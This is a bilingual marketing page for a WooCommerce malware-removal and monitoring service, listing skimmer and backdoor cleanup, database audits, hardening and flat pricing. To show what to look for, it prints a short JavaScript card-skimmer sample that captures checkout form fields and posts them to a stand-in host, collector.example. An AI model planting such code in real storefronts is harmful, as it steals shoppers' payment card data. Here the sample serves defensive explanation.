threatover Patrik Grobshäuser

WooCommerce · skimmer · backdoor · clean

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

What gets done

Les deux côtés du fil.

  • Client-side

    Skimmers de cartes, surcouches de formulaires de paiement, redirections conditionnelles, cryptojackers. JavaScript sur le checkout audité ligne par ligne.

  • Server-side

    Web shells, backdoors, payloads RCE de plugins, utilisateurs admin injectés. Supprimés en lisant les diffs de fichiers et les diffs de base de données, pas par pattern-matching.

  • DB audit

    wp_options pour les payloads autoloadés, wp_posts pour le spam, wp_usermeta pour les privilèges dormants, tables wp_woocommerce_* pour les altérations.

  • Plugin triage

    Plugins actifs comparés aux CVE publiés. Plugins vulnérables patchés ou remplacés — pas simplement désactivés.

  • Hardening

    wp-config, permissions, rotation des secrets, XML-RPC, REST API et réduction de la surface de login.

  • Rapport

    Rapport forensique en clair : ce qui a été trouvé, quand cela a été introduit, ce qui a été supprimé. Remettez-le à un acquéreur, un assureur ou votre QSA.

What a skimmer looks like

Script externe sur le checkout. C'est généralement tout.

Un skimmer WooCommerce est souvent une simple inclusion JavaScript sur la page de checkout qui envoie les champs du formulaire du client vers un hôte distant avant que WooCommerce ne soumette la commande. Le script est minuscule, l'appel réseau ressemble à un ping d'analytics tiers, et le client ne voit rien d'anormal.

Rough shape of a checkout skimmer
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Les vrais skimmers obfusquent la destination et ne se déclenchent que lorsque le total du panier est non nul — mais la structure est la même. Auditez chaque JS sur le checkout, pas seulement ceux que vous vous souvenez d'avoir installés.

Tarifs

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage

Monitoring

$29 / mo

per site, cancel any time

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

E-mail [email protected] or use the contact form.